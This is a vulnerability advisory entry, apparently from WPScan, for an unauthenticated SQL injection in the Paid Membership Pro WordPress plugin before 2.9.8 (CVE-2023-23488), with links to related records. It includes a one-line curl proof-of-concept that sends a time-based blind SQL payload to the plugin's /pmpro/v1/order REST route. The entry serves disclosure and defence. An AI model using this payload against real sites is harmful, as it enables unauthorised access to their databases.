Lucene search
WpvulndbWPVDB-ID:9847EA7F-B3C3-4304-A03B-152264DDCCFAHistoryJan 12, 2023 - 12:00 a.m.
Paid Membership Pro < 2.9.8 - Unauthenticated SQLi
2023-01-1200:00:00
wpscan.com
23
paid membership pro
unauthenticated
sql injection
rest route
vulnerable
2.9.8
0.054 Low
EPSS
Percentile
93.2%
The plugin does not properly sanitise and escape the code parameter before using it in a SQL statement via the /pmpro/v1/order REST route, leading to a SQL injection exploitable by unauthenticated users
PoC
curl “https://example.com/?rest_route=/pmpro/v1/order&code;=a’ OR (SELECT 1 FROM (SELECT(SLEEP(2)))a)–%20-”
| CPE | Name | Operator | Version |
|---|---|---|---|
| paid-memberships-pro | lt | 2.9.8 |
Related
cve
cve
CVE-2023-23488
2023-01-20 18:15:10
packetstorm
packetstorm
WordPress Paid Memberships Pro 2.9.8 SQL Injection
2023-04-03 00:00:00
nuclei
nuclei
WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection
2023-02-19 19:09:46
nvd
nvd
CVE-2023-23488
2023-01-20 18:15:10
osv
osv
CVE-2023-23488
2023-01-20 18:15:10
wpexploit
wpexploit
Paid Membership Pro < 2.9.8 - Unauthenticated SQLi
2023-01-12 00:00:00
githubexploit
githubexploit
Exploit for SQL Injection in Strangerstudios Paid Memberships Pro
2023-06-07 17:30:25
Exploit for SQL Injection in Strangerstudios Paid Memberships Pro
2023-01-24 18:26:10
exploitdb
exploitdb
prion
prion
Sql injection
2023-01-20 18:15:00
cvelist
cvelist
CVE-2023-23488
2023-01-20 00:00:00
openvas
openvas
WordPress Paid Memberships Pro Plugin < 2.9.8 SQLi Vulnerability
2023-01-23 00:00:00
zdt
zdt
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-01-20 19:46:50